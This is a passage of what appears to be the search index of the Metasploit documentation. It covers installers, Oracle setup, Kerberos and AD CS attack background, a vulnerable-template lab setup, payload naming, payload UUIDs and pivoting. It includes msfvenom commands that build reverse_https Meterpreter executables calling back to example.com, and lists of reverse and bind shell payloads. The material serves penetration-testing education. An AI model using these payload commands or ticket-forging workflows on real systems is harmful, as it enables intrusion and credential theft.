    "content": "Download the latest Windows installer or view older builds. To install, download the .msi package, adjust your Antivirus as-needed to ignore c:\\metasploit-framework and execute the installer by right-clicking the installer file and selecting “Run as Administrator”. The msfconsole command and all related tools will be added to the system %PATH% environment variable. Windows Anti-virus software flags the contents of these packages! . If you downloaded Metasploit from us, there is no cause for alarm. We pride ourselves on offering the ability for our customers and followers to have the same toolset that the hackers have so that they can test systems more accurately. Because these (and the other exploits and tools in Metasploit) are identical or very similar to existing malicious toolsets, they can be used for nefarious purposes, and they are often flagged and automatically removed by antivirus programs, just like the malware they mimic. Windows silent installation . The PowerShell below will download and install the framework, and is suitable for automated Windows deployments. Note that, the installer will be downloaded to $DownloadLocation and won’t be deleted after the script has run. [CmdletBinding()] Param( $DownloadURL = \"https://windows.metasploit.com/metasploitframework-latest.msi\", $DownloadLocation = \"$env:APPDATA/Metasploit\", $InstallLocation = \"C:\\Tools\", $LogLocation = \"$DownloadLocation/install.log\" ) If(! (Test-Path $DownloadLocation) ){ New-Item -Path $DownloadLocation -ItemType Directory } If(! (Test-Path $InstallLocation) ){ New-Item -Path $InstallLocation -ItemType Directory } $Installer = \"$DownloadLocation/metasploit.msi\" Invoke-WebRequest -UseBasicParsing -Uri $DownloadURL -OutFile $Installer &amp;amp; $Installer /q /log $LogLocation INSTALLLOCATION=\"$InstallLocation\" . ",
    "url": "/docs/using-metasploit/getting-started/nightly-installers.html#installing-metasploit-on-windows",
    "relUrl": "/docs/using-metasploit/getting-started/nightly-installers.html#installing-metasploit-on-windows"
  },"705": {
    "doc": "Nightly Installers",
    "title": "Improving these installers",
    "content": "Feel free to review and help improve the source code for our installers. ",
    "url": "/docs/using-metasploit/getting-started/nightly-installers.html#improving-these-installers",
    "relUrl": "/docs/using-metasploit/getting-started/nightly-installers.html#improving-these-installers"
  },"706": {
    "doc": "Nightly Installers",
    "title": "Nightly Installers",
    "content": "Installers are built nightly for macOS, Windows (64-bit) and Linux. These installers include dependencies (like Ruby and PostgreSQL) and integrate with your package manager, so they’re easy to update. ",
    "url": "/docs/using-metasploit/getting-started/nightly-installers.html",
    "relUrl": "/docs/using-metasploit/getting-started/nightly-installers.html"
  },"707": {
    "doc": "Oracle Usage",
    "title": "Install oracle InstantClient",
    "content": "InstantClient 10 is recommended to allow you to talk with 8,9,10,&amp;amp;11 server versions. Go to https://www.oracle.com/database/technologies/instant-client/downloads.html and select the link corresponding to your UNIX PC’s architecture. Example for Linux x64, use the Instant Client for Linux x86-64 link, which should take you to https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html . Grab these: . | Instant Client Package - Basic | Instant Client Package - SDK (devel) | Instant Client Package - SQL*Plus (not needed for Metasploit but useful to have) | . unzip into /opt/oracle . cd /opt/oracle unzip /opt/oracle/oracle-instantclient-basic-10.2.0.4-1.i386.zip unzip /opt/oracle/oracle-instantclient-sqlplus-10.2.0.4-1.i386.zip unzip /opt/oracle/oracle-instantclient-devel-10.2.0.4-1.i386.zip . Now set up a symlink so the gem installation can find the right lib: . ln -s libclntsh.so.10.1 libclntsh.so . ",
    "url": "/docs/using-metasploit/other/oracle-support/oracle-usage.html#install-oracle-instantclient",
    "relUrl": "/docs/using-metasploit/other/oracle-support/oracle-usage.html#install-oracle-instantclient"
  },"708": {
    "doc": "Oracle Usage",
    "title": "Set up your environment",
    "content": "You can either create .sh file to make the appropriate changes when you need it or just add it to your .bashrc . export PATH=$PATH:/opt/oracle/instantclient_10_2 export SQLPATH=/opt/oracle/instantclient_10_2 export TNS_ADMIN=/opt/oracle/instantclient_10_2 export LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2 export ORACLE_HOME=/opt/oracle/instantclient_10_2 . ",
    "url": "/docs/using-metasploit/other/oracle-support/oracle-usage.html#set-up-your-environment",
    "relUrl": "/docs/using-metasploit/other/oracle-support/oracle-usage.html#set-up-your-environment"
  },"709": {
    "doc": "Oracle Usage",
    "title": "Additional steps for Kali Linux",
    "content": "If you are using Kali Linux, you need to perform a couple of additional steps before the Oracle client gem will build properly. First, set your path to prefer the correct version of ruby so that Metasploit can use it: . root@kali:~/ruby-oci8-ruby-oci8-2.1.8# export PATH=/opt/metasploit/ruby/bin:$PATH . Next, install libgmp (needed to build the gem): . root@kali:~/ruby-oci8-ruby-oci8-2.1.8# apt-get install libgmp-dev Reading package lists... Done Building dependency tree Reading state information... Done Suggested packages: libgmp10-doc libmpfr-dev The following NEW packages will be installed: libgmp-dev 0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. Need to get 0 B/610 kB of archives. After this operation, 1,740 kB of additional disk space will be used. Selecting previously unselected package libgmp-dev:amd64. (Reading database ... 322643 files and directories currently installed.) Unpacking libgmp-dev:amd64 (from .../libgmp-dev_2%3a5.0.5+dfsg-2_amd64.deb) ... Setting up libgmp-dev:amd64 (2:5.0.5+dfsg-2) ... ",
    "url": "/docs/using-metasploit/other/oracle-support/oracle-usage.html#additional-steps-for-kali-linux",
    "relUrl": "/docs/using-metasploit/other/oracle-support/oracle-usage.html#additional-steps-for-kali-linux"
  },"710": {
    "doc": "Oracle Usage",
    "title": "Install the gem",
    "content": "Back in your Metasploit directory, copy Gemfile.local.example to Gemfile.local, then add the following line to the :local group . gem 'ruby-oci8' . Update gems: . bundle --gemfile Gemfile.local . ",
    "url": "/docs/using-metasploit/other/oracle-support/oracle-usage.html#install-the-gem",
    "relUrl": "/docs/using-metasploit/other/oracle-support/oracle-usage.html#install-the-gem"
  },"711": {
    "doc": "Oracle Usage",
    "title": "Oracle Usage",
    "content": " ",
    "url": "/docs/using-metasploit/other/oracle-support/oracle-usage.html",
    "relUrl": "/docs/using-metasploit/other/oracle-support/oracle-usage.html"
  },"712": {
    "doc": "Overview",
    "title": "What is Kerberos?",
    "content": "Kerberos is an authentication protocol. In response to a client proving their identity, Kerberos generates tickets which can be used to further interact with systems as a proof of identity. Kerberos is not used for authorization. NTLM is an alternative authentication protocol implemented in Microsoft Products. The difference between authentication and authorization is: . | Authentication - Verification of identity | Authorization - Verification of access rights. This takes place after authentication. | . Kerberos can be found on the following ports: . | 88/TCP - More frequently used, and supported by Metasploit | 88/UDP - Currently not supported by Metasploit | . Metasploit currently provides modules for requesting authentication tickets, forging tickets, exploitation, and more. ",
    "url": "/docs/pentesting/active-directory/kerberos/overview.html#what-is-kerberos",
    "relUrl": "/docs/pentesting/active-directory/kerberos/overview.html#what-is-kerberos"
  },"713": {
    "doc": "Overview",
    "title": "Core Concepts",
    "content": "Key Distribution Centre . The Key Distribution center consists of two parts. The Authentication server (AS) and the Ticket Granting Server (TGS). The Authentication server (AS) performs the client authentication process. Authentication is generally performed using a secret key such as the user’s password - but other methods such exist such as pkinit which relies on public keys for authentication. If authentication is successful, the authentication server will return a new Ticket Granting Ticket (TGT). The Ticket Granting Server requires a user’s TGT, and the service details that the user would like to gain access to. These Service Tickets used are for gaining access to services such as SMB/WinRM/etc. In most Kerberos pentesting tools, including Metasploit, the granted Service Tickets are called TGS. Service Principal Name . A (SPN) is a forest unique string. It associates a service to a service logon account. The SPN is set on a user computer object via the AD Schema. Generally the SPN follows the format &amp;lt;service class&amp;gt;/&amp;lt;host&amp;gt;&amp;lt;realm&amp;gt;:&amp;lt;port&amp;gt;/&amp;lt;service name&amp;gt;. A service can have multiple SPNs. On a Window’s Domain Controller you can view the available SPNs with the setspn -q */* command. Security identifiers . In the context of Microsoft’s Active Directory - Security identifiers (SID) are used to uniquely identify users, groups, and computer accounts. This knowledge is required when using the auxiliary/admin/kerberos/forge_ticket module. An example of a SID is S-1-5-21-1266190811-2419310613-1856291569-500, which can be described as: . S-1-5-21 1266190811-2419310613-1856291569 500 ^ SID prefix ^ Domain Identifier ^ Relative ID - the Administrator account . You can view SIDs on a domain controller with: . C:\\Users\\Administrator&amp;gt;wmic useraccount get name, sid Name SID Administrator S-1-5-21-1266190811-2419310613-1856291569-500 Guest S-1-5-21-1266190811-2419310613-1856291569-501 krbtgt S-1-5-21-1266190811-2419310613-1856291569-502 DefaultAccount S-1-5-21-1266190811-2419310613-1856291569-503 . ",
    "url": "/docs/pentesting/active-directory/kerberos/overview.html#core-concepts",
    "relUrl": "/docs/pentesting/active-directory/kerberos/overview.html#core-concepts"
  },"714": {
    "doc": "Overview",
    "title": "Authentication example",
    "content": "Below is an example authentication workflow in Kerberos for authenticating to an SMB service running on Windows: . | Step 1. Request TGT . | AS_REQ . | Generate Kerberos Encryption key from user credentials | . | AS_REP . | Returned after verifying the encrypted timestamp | The client stores later usage to request future service tickets | . | . | Step 2. Request Service Ticket . | TGS_REQ . | Use the TGT from Step 1 | Specify the required SPN (Service principal name), i.e. cifs/host.realm.local | . | TGS_REP . | Receive new TGS which can be used with a service | . | . | Step 3. Interact with service . | AP_REQ . | Send the service ticket | . | AP_REP . | Success/Failure information | . | . | . sequenceDiagram participant msf as metasploit participant kdc as Kerberos participant smb as smb Note over msf,kdc: 1) Request Ticket Granting Ticket - TGT msf-&amp;gt;&amp;gt;kdc: AS_REQ&amp;lt;br &amp;gt;encKey = EncKeyFor(user, pass, realm)&amp;lt;br &amp;gt;sname = krbtgt/realm kdc-&amp;gt;&amp;gt;msf: AS_REP&amp;lt;br &amp;gt;TGT Note over msf,kdc: 2) Request Service Ticket - TGS msf-&amp;gt;&amp;gt;kdc: TGS_REQ&amp;lt;br&amp;gt;Ticket&amp;lt;br&amp;gt;spn=cifs/host.domain.local kdc-&amp;gt;&amp;gt;msf: TGS_REP&amp;lt;br&amp;gt;TGS Note over msf,kdc: 3) Request Service Access msf-&amp;gt;&amp;gt;smb: AP_REQ&amp;lt;br&amp;gt;Service Ticket smb-&amp;gt;&amp;gt;msf: AP_REP . ",
    "url": "/docs/pentesting/active-directory/kerberos/overview.html#authentication-example",
    "relUrl": "/docs/pentesting/active-directory/kerberos/overview.html#authentication-example"
  },"715": {
    "doc": "Overview",
    "title": "Common Kerberos workflows",
    "content": ". | User enumeration / bruteforcing - the auxiliary/scanner/kerberos/kerberos_login module can be used to enumerate user accounts or bruteforce credentials | AS-REP Roasting - Some Kerberos accounts may be configured with a Do not require Kerberos preauthentication flag. For these accounts a Kerberos TGT will be returned by the KDC without needing to authenticate. These TGTs can be bruteforced to learn the original user’s credentials. The auxiliary/scanner/kerberos/kerberos_login module implements this workflow. | Forging Tickets - After compromising a KDC or service account it is possible to forge tickets for persistence. The auxiliary/admin/kerberos/forge_ticket module can forge both Golden and Silver tickets. | Inspecting Tickets - Kerberos tickets can be inspected with the auxiliary/admin/kerberos/inspect_ticket module. If the encryption key is known, the decrypted contents can be displayed. | Service authentication - Using Kerberos to authenticate via services such as WinRM/Microsoft SQL Server/SMB/LDAP/etc | Kerberoasting - Finding services in Active Directory that are associated with normal user accounts which may have brute forcible encryption keys that lead to Active Directory credentials. | . ",
    "url": "/docs/pentesting/active-directory/kerberos/overview.html#common-kerberos-workflows",
    "relUrl": "/docs/pentesting/active-directory/kerberos/overview.html#common-kerberos-workflows"
  },"716": {
    "doc": "Overview",
    "title": "Overview",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/overview.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/overview.html"
  },"717": {
    "doc": "Overview",
    "title": "What is AD CS?",
    "content": "Active Directory Certificate Services, also known as AD CS, is an Active Directory tool for letting administrators issue and manage public key certificates that can be used to connect to various services and principals on the domain. It is often used to provide certificates that can be used in place of credentials for logging into a network, or to provide certificates that can be used to sign and verify the authenticity of data. The main guarantees that AD CS aims to provide are: . | Confidentiality via encryption | Integrity via digital signatures | Authentication by associating certificate keys with computers, users, or device accounts on a computer network. | . Given that AD CS often holds highly sensitive keys and access credentials for a corporate network, this makes it a prime target for attackers. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/overview.html#what-is-ad-cs",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/overview.html#what-is-ad-cs"
  },"718": {
    "doc": "Overview",
    "title": "Required Ports for AD CS",
    "content": "Active Directory requires the following TCP ports be open on all domain controllers, which heavily overlaps with the ports required for AD CS: . | TCP/UDP port 53: DNS | TCP/UDP port 88: Kerberos authentication | TCP/UDP port 135: RPC | TCP/UDP port 137-138: NetBIOS | TCP/UDP port 389: LDAP | TCP/UDP port 445: SMB | TCP/UDP port 464: Kerberos password change | TCP/UDP port 636: LDAP SSL | TCP/UDP port 3268-3269: Global catalog | . AD CS additionally has the following requirements for Certificate Authorities: . | TCP random port above 1023: RPC dynamic port allocation | . The following ports are optional depending on services used, and tend to apply to Certificate Enrollment Web Services: . | TCP port 80: HTTP | TCP port 443: HTTPS | TCP port 445: SMB | . If using Active Directory Federation Services (ADFS) for single sign on the following ports are also required: . | TCP port 80: HTTP | TCP port 443: HTTPS | TCP port 49443: ADFS | . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/overview.html#required-ports-for-ad-cs",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/overview.html#required-ports-for-ad-cs"
  },"719": {
    "doc": "Overview",
    "title": "Core Concepts",
    "content": "Microsoft provides a very useful training module that covers the fundamentals of AD CS and as well as examples which cover the management of certificate enrollment, certificate revocation and certificate trusts. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/overview.html#core-concepts",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/overview.html#core-concepts"
  },"720": {
    "doc": "Overview",
    "title": "Setting up A Vulnerable AD CS Server",
    "content": "The following steps assume that you have installed an AD CS on either a new or existing domain controller. Installing AD CS . | Open the Server Manager | Select Add roles and features | Select “Active Directory Certificate Services” under the “Server Roles” section | When prompted add all of the features and management tools | On the AD CS “Role Services” tab, leave the default selection of only “Certificate Authority” | Completion the installation and reboot the server | Reopen the Server Manager | Go to the AD CS tab and where it says “Configuration Required”, hit “More” then “Configure Active Directory Certificate…” | Select “Certificate Authority” in the Role Services tab | Select “Enterprise CA” in the “Setup Type” tab (the user must be a Domain Administrator for this option to be available) | Keep all of the default settings, noting the value of the “Common name for this CA” on the “CA Name” tab (this value corresponds to the CA datastore option) | Accept the rest of the default settings and complete the configuration | . Setting up a ESC1 Vulnerable Certificate Template . | Open up the run prompt and type in certsrv. | In the window that appears you should see your list of certification authorities under Certification Authority (Local). Right click on the folder in the drop down marked Certificate Templates and then click Manage. | Scroll down to the User certificate. Right click on it and select Duplicate Template. | From here you can refer to the following Active-Directory-Certificate-Services-abuse documentation for screenshots. | Select the General tab and rename this to something meaningful like ESC1-Template, then click the Apply button. | In the Subject Name tab, select Supply in the request and click Ok on the security warning that appears. Then click the Apply button. | Scroll to the Extensions tab and under Application Policies ensure that Client Authentication, Server Authentication, KDC Authentication, or Smart Card Logon is listed. Then click the Apply button. | Under the Security tab make sure that Domain Users group listed and the Enroll permissions is marked as allowed for this group. | Under Issuance Requirements tab, ensure that under Require the following for enrollment that the CA certificate manager approval box is unticked, as is the This number of authorized signatures box. | Click Apply and then Ok | Go back to the certsrv screen and right click on the Certificate Templates folder. Then click New followed by Certificate Template to Issue. | Scroll down and select the ESC1-Template certificate, or whatever you named the ESC1 template you created, and select OK. The certificate should now be available to be issued by the CA server. | . Setting up a ESC2 Vulnerable Certificate Template . | Open up certsrv | Scroll down to Certificate Templates folder, right click on it and select Manage. | Find the ESC1 certificate template you created earlier and right click on that, then select Duplicate Template. | Select the General tab, and then name the template ESC2-Template. Then click Apply. | Go to the Subject Name tab and select Build from this Active Directory Information and select Fully distinguished name under the Subject Name Format. The main idea of setting this option is to prevent being able to supply the subject name in the request as this is more what makes the certificate vulnerable to ESC1. The specific options here I don’t think will matter so much so long as the Supply in the request option isn’t ticked. Then click Apply. | Go the to Extensions tab and click on Application Policies. Then click on Edit. | Delete all the existing application policies by clicking on them one by one and clicking the Remove button. | Click the Add button and select Any Purpose from the list that appears. Then click the OK button. | Click the Apply button, and then OK. The certificate should now be created. | Go back to the certsrv screen and right click on the Certificate Templates folder. Then click New followed by Certificate Template to Issue. | Scroll down and select the ESC2-Template certificate, or whatever you named the ESC2 template you created, and select OK. The certificate should now be available to be issued by the CA server. | . Setting up a ESC3 Template 1 Vulnerable Certificate Template . | Follow the instructions above to duplicate the ESC2 template and name it ESC3-Template1, then click Apply. | Go to the Extensions tab, click the Application Policies entry, click the Edit button, and remove the Any Purpose policy and replace it with Certificate Request Agent, then click OK. | Click Apply. | Go to Issuance Requirements tab and double check that both CA certificate manager approval and This number of authorized signatures are unchecked. | Click Apply if any changes were made or the button is not grey’d out, then click OK to create the certificate. | Go back to the certsrv screen and right click on the Certificate Templates folder. Then click New followed by Certificate Template to Issue. | Scroll down and select the ESC3-Template1 certificate, or whatever you named the ESC3 template number 1 template you just created, and select OK. The certificate should now be available to be issued by the CA server. | . Setting up a ESC3 Template 2 Vulnerable Certificate Template . | Follow the instructions above to duplicate the ESC2 template and name it ESC3-Template2, then click Apply. | Go to the Extensions tab, click the Application Policies entry, click the Edit button, and remove the Any Purpose policy and replace it with Client Authentication, then click OK. | Click Apply. | Go to Issuance Requirements tab and double check that both CA certificate manager approval is unchecked. | Check the This number of authorized signatures checkbox and ensure the value specified is 1, and that the Policy type required in signature is set to Application Policy, and that the Application policy value is Certificate Request Agent. | Click Apply and then click OK to issue the certificate. | Go back to the certsrv screen and right click on the Certificate Templates folder. Then click New followed by Certificate Template to Issue. | Scroll down and select the ESC3-Template2 certificate, or whatever you named the ESC3 template number 2 template you just created, and select OK. The certificate should now be available to be issued by the CA server. | . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/overview.html#setting-up-a-vulnerable-ad-cs-server",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/overview.html#setting-up-a-vulnerable-ad-cs-server"
  },"721": {
    "doc": "Overview",
    "title": "Overview",
    "content": " ",
    "url": "/docs/pentesting/active-directory/ad-certificates/overview.html",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/overview.html"
  },"722": {
    "doc": "Payload Rename Justification",
    "title": "Payload Rename Justification",
    "content": "The Issue . Many payloads perform the same task, yet have different names. This results in confusion and a bad new-user experience. Specifically, ARCH_CMD payloads differ greatly from their shellcode-derived brethren. For example, the most heavily used payload is windows/meterpreter/reverse_tcp; the equivalent in ARCH_CMD land is cmd/unix/reverse, which gives no indication that the session type will be a shell. The Proposal . I propose we rename all the aberrantly-named payloads to match the convention. Specifically: . | cmd/unix/bind_awk -&amp;gt; cmd/unix/shell_bind_tcp_awk | cmd/unix/bind_lua -&amp;gt; cmd/unix/shell_bind_tcp_lua | cmd/unix/bind_netcat -&amp;gt; cmd/unix/shell_bind_tcp_netcat | cmd/unix/bind_netcat_gaping -&amp;gt; cmd/unix/shell_bind_tcp_netcat_gaping | cmd/unix/bind_netcat_gaping_ipv6 -&amp;gt; cmd/unix/shell_bind_tcp_netcat_gaping_ipv6 | cmd/unix/bind_nodejs -&amp;gt; cmd/unix/shell_bind_tcp_nodejs | cmd/unix/bind_perl -&amp;gt; cmd/unix/shell_bind_tcp_perl | cmd/unix/bind_perl_ipv6 -&amp;gt; cmd/unix/shell_bind_tcp_perl_ipv6 | cmd/unix/bind_ruby -&amp;gt; cmd/unix/shell_bind_tcp_ruby | cmd/unix/bind_ruby_ipv6 -&amp;gt; cmd/unix/shell_bind_tcp_ruby_ipv6 | cmd/unix/bind_zsh -&amp;gt; cmd/unix/shell_bind_tcp_zsh | cmd/unix/generic -&amp;gt; cmd/unix/exec | cmd/unix/reverse -&amp;gt; cmd/unix/shell_reverse_tcp_telnet | cmd/unix/reverse_awk -&amp;gt; cmd/unix/shell_reverse_tcp_awk | cmd/unix/reverse_bash -&amp;gt; cmd/unix/shell_reverse_tcp_bash | cmd/unix/reverse_bash_telnet_ssl -&amp;gt; cmd/unix/shell_reverse_tcp_bash_telnet_ssl | cmd/unix/reverse_lua -&amp;gt; cmd/unix/shell_reverse_tcp_lua | cmd/unix/reverse_netcat -&amp;gt; cmd/unix/shell_reverse_tcp_netcat | cmd/unix/reverse_netcat_gaping -&amp;gt; cmd/unix/shell_reverse_tcp_netcat_gaping | cmd/unix/reverse_nodejs -&amp;gt; cmd/unix/shell_reverse_tcp_nodejs | cmd/unix/reverse_openssl -&amp;gt; cmd/unix/shell_reverse_tcp_openssl | cmd/unix/reverse_perl -&amp;gt; cmd/unix/shell_reverse_tcp_perl | cmd/unix/reverse_perl_ssl -&amp;gt; cmd/unix/shell_reverse_tcp_perl_ssl | cmd/unix/reverse_php_ssl -&amp;gt; cmd/unix/shell_reverse_tcp_php_ssl | cmd/unix/reverse_python -&amp;gt; cmd/unix/shell_reverse_tcp_python | cmd/unix/reverse_python_ssl -&amp;gt; cmd/unix/shell_reverse_tcp_python_ssl | cmd/unix/reverse_ruby -&amp;gt; cmd/unix/shell_reverse_tcp_ruby | cmd/unix/reverse_ruby_ssl -&amp;gt; cmd/unix/shell_reverse_tcp_ruby_ssl | cmd/unix/reverse_ssl_double_telnet -&amp;gt; cmd/unix/shell_reverse_tcp_ssl_double_telnet | cmd/unix/reverse_zsh -&amp;gt; cmd/unix/shell_reverse_tcp_zsh | cmd/windows/bind_lua -&amp;gt; cmd/windows/shell_bind_tcp_lua | cmd/windows/bind_perl -&amp;gt; cmd/windows/shell_bind_tcp_perl | cmd/windows/bind_perl_ipv6 -&amp;gt; cmd/windows/shell_bind_tcp_perl_ipv6 | cmd/windows/bind_ruby -&amp;gt; cmd/windows/shell_bind_tcp_ruby | cmd/windows/download_eval_vbs -&amp;gt; cmd/windows/download_eval_vbs | cmd/windows/download_exec_vbs -&amp;gt; cmd/windows/download_exec_vbs | cmd/windows/generic -&amp;gt; cmd/windows/exec | cmd/windows/reverse_lua -&amp;gt; cmd/windows/shell_reverse_tcp_lua | cmd/windows/reverse_perl -&amp;gt; cmd/windows/shell_reverse_tcp_perl | cmd/windows/reverse_ruby -&amp;gt; cmd/windows/shell_reverse_tcp_ruby | . Difficulties . Changing module names always entails a backwards compatibility issue. | Experienced users are used to the old names and may be confused and annoyed by the change. This is mitigated somewhat by the fact that these payloads are probably used less often than other architectures, and thus users will have less ingrained muscle memory for them. | It will break users’ existing RC scripts that set payloads to any of the renamed modules. | . I think consistency across platforms and architectures is more important and will result in less confusion overall. ",
    "url": "/docs/development/propsals/payload-rename-justification.html",
    "relUrl": "/docs/development/propsals/payload-rename-justification.html"
  },"723": {
    "doc": "Payload UUID",
    "title": "Payload UUID",
    "content": "In mid-2015, a new feature was added to many HTTP and TCP Metasploit payloads: Payload UUIDs. A Payload UUID is a 16-byte value that encodes an 8-byte identifier, a 1-byte architecture ID, a 1-byte platform ID, a 4-byte timestamp, and two additional bytes for obfuscation. The source code comments go into more detail. In the case of HTTP payloads, the 16-byte UUID value is encoded in base64url format resulting in a 22-byte string. This value is always placed in the beginning of the URL used by the payload. TCP payloads send the 16-byte raw value over the socket once a connection is established. The goal of Payload UUIDs is three-fold: . | Uniquely identify a generated payload. This is important when running social engineering campaigns to identify what specific payload a target executed. If an email campaign resulted in one user forwarding a payload to another user before it was executed, this can be determined by reviewing the UUID in the session listing. | Drop connections that do not match known UUIDs. This allows a listener to be setup that only allows known sessions to connect, which is important when running internet-facing payload handlers. | Enable universal handlers. The embedded platform and architecture identifiers allow the listener to determine what type of stage to send back to a stager. This will eventually allow for a single listener to be used with multiple exploits, even those that target different platforms and architectures. | . Specifying the UUID . Although Payload UUIDs are normally random, it is possible to specify a static UUID value using the PayloadUUIDRaw option. This option takes a 8-byte hex string, such as “0011223344556677”. For example: . $ ./msfvenom -p windows/meterpreter/reverse_https LHOST=example.com LPORT=4444 PayloadUUIDRaw=4444444444444444 -f exe -o payload.exe . Instead of specifying a static UUID as the raw 8-byte value, it is also possible to derive a static UUID using an arbitrary-length string using the PayloadUUIDSeed option: . $ ./msfvenom -p windows/meterpreter/reverse_https LHOST=example.com LPORT=4444 PayloadUUIDSeed=ShellsAreDelicious -f exe -o payload.exe . Tracking the UUID . Payload UUIDs are enabled by default, but are not tracked unless the PayloadUUIDTracking option is set to true. Setting this option causes a new entry to be created in ~/.msf4/payloads.json when any UUID-enabled payload is generated. It is also possible to create a local-only name for a given UUID using the PayloadUUIDName. The example below will create a new registered payload with a custom name: . $ ./msfvenom -p windows/meterpreter/reverse_https LHOST=example.com LPORT=4444 PayloadUUIDTracking=true PayloadUUIDName=EmailCampaign20150101 -f exe -o payload.exe $ cat ~/.msf4/payloads.json { \"68017d72958c40f6\": { \"arch\": \"x86\", \"platform\": \"windows\", \"timestamp\": 1435277049, \"payload\": \"payload/windows/meterpreter/reverse_https\", \"datastore\": {\"AutoLoadStdapi\":true,\"AutoRunScript\":\"\",\"AutoSystemInfo\":true,\"AutoVerifySession\":true,\"AutoVerifySessionTimeout\":30,\"EXITFUNC\":\"process\",\"EnableStageEncoding\":false,\"EnableUnicodeEncoding\":false,\"HttpUnknownRequestResponse\":\"\\u003Chtml\\u003E\\u003Cbody\\u003E\\u003Ch1\\u003EIt works!\\u003C/h1\\u003E\\u003C/body\\u003E\\u003C/html\\u003E\",\"IgnoreUnknownPayloads\":false,\"InitialAutoRunScript\":\"\",\"LHOST\":\"127.1.1.1\",\"LPORT\":4444,\"MeterpreterServerName\":\"Apache\",\"MeterpreterUserAgent\":\"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\",\"OverrideRequestHost\":false,\"PAYLOADUUIDNAME\":\"EmailCampaign20150101\",\"PayloadProxyPort\":0,\"PayloadProxyType\":\"HTTP\",\"PayloadUUIDTracking\":true,\"PrependMigrate\":false,\"ReverseListenerBindPort\":0,\"SessionCommunicationTimeout\":300,\"SessionExpirationTimeout\":604800,\"SessionRetryTotal\":3600,\"SessionRetryWait\":10,\"StageEncoderSaveRegisters\":\"\",\"StageEncodingFallback\":true,\"StagerRetryCount\":10,\"StagerURILength\":0,\"StagerVerifySSLCert\":false,\"VERBOSE\":false}, \"name\": \"EmailCampaign20150101\", \"urls\": [ \"/aAF9cpWMQPb-3f_cq1FoJA040uMw26kAnvroJdztpVzDrNpqbpT7t3DyYy0cR2TyQE87XxHgIOKiYwP2FJNlNjrBXWQNiGWtzUK1ueJ0DyFjCXmULVo_gGrvi\" ] } } . Once this payload is launched, the output of the sessions -l -v command will show the UUID, whether or not the UUID is registered, and any locally-assigned name of the UUID: . msf exploit(handler) &amp;gt; run -j [*] 127.0.0.1:36235 (UUID: 68017d72958c40f6/x86=1/windows=1/2015-06-26T00:04:09Z) Staging Native payload ... [*] Meterpreter session 1 opened (127.1.1.1:4444 -&amp;gt; 127.0.0.1:36235) at 2015-06-25 17:12:40 -0700 msf exploit(handler) &amp;gt; sessions -l -v Active sessions =============== Session ID: 1 Type: meterpreter x86/win32 Info: fang\\hdm @ fang Tunnel: 127.1.1.1:4444 -&amp;gt; 127.0.0.1:36235 (127.0.0.1) Via: exploit/multi/handler UUID: 68017d72958c40f6/x86=1/windows=1/2015-06-26T00:04:09Z MachineID: 1fd541d2c4278e2d0c1b02f17f142f2b CheckIn: 1s ago @ 2015-06-25 17:12:47 -0700 Registered: Yes - Name=\"EmailCampaign20150101\" . Whitelisting UUIDs . The ~/.msf4/payloads.json file can also be used as a whitelist. This makes it possible to run a listener on a common port on a public IP address without the Metasploit Framework instance being flooded with bogus sessions. To enable whitelisting for HTTP payloads, set the IgnoreUnknownPayloads option to true in the handler instance. Any incoming request that does match both a registered Payload UUID and one of the pre-generated URLs will be ignored. The payloads.json file can be copied between Metasploit Framework instances and even hand-edited while the framework is running. ",
    "url": "/docs/using-metasploit/intermediate/payload-uuid.html",
    "relUrl": "/docs/using-metasploit/intermediate/payload-uuid.html"
  },"724": {
    "doc": "Pivoting in Metasploit",
    "title": "Overview",
    "content": "Whilst in test environments one is often looking at flat networks that only have one subnet and one network environment, the reality is that when it comes to pentests that are attempting to compromise an entire company, you will often have to deal with multiple networks, often with switches or firewalls in-between that are intended to keep these networks separate from one another. In order for pivoting to work, you must have compromised a host that is connected to two or more networks. This usually means that the host has two or more network adapters, whether that be physical network adapters, virtual network adapters, or a combination of both. Once you have compromised a host that has multiple network adapters you can then use the session that you have obtained on that host to use that host as a pivot, and relay traffic through the compromised host to the target machine that you want to access. This allows you, as an attacker, to access machines on networks that you might not otherwise have access to, by utilizing the access to internal networks that the compromised machine has. Now that we understand some of the background, lets see this in action a bit more by setting up a sample environment and walking through some of Metasploit’s pivoting features. ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#overview",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#overview"
  },"725": {
    "doc": "Pivoting in Metasploit",
    "title": "Supported Session Types",
    "content": "Pivoting functionality is provided by all Meterpreter and SSH sessions that occur over TCP channels. Whilst Meterpreter is mentioned below, keep in mind that this would also work with an SSH session as well. We have just resorted to using Meterpreter for this example for demonstration purposes. ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#supported-session-types",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#supported-session-types"
  },"726": {
    "doc": "Pivoting in Metasploit",
    "title": "Testing Pivoting",
    "content": "Target Environment Setup . | Kali Machine . | Internal: None | External: 172.19.182.171 | . | Windows 11 Machine (used as pivot) . | Internal: 169.254.16.221 | External: 172.19.185.34 | . | Windows Server 2019 Machine (final target) . | Internal: 169.254.204.110 | External: None | . | . For the purpose of simplicity we will assume we have a session on the Windows 11 box, which we will use as a pivot to route our traffic through to the Windows Server 2019 box at 169.254.204.110. There a few ways to register this route in Metasploit so that it knows how to redirect traffic appropriately. Lets take a look at these methods. ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#testing-pivoting",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#testing-pivoting"
  },"727": {
    "doc": "Pivoting in Metasploit",
    "title": "AutoRoute",
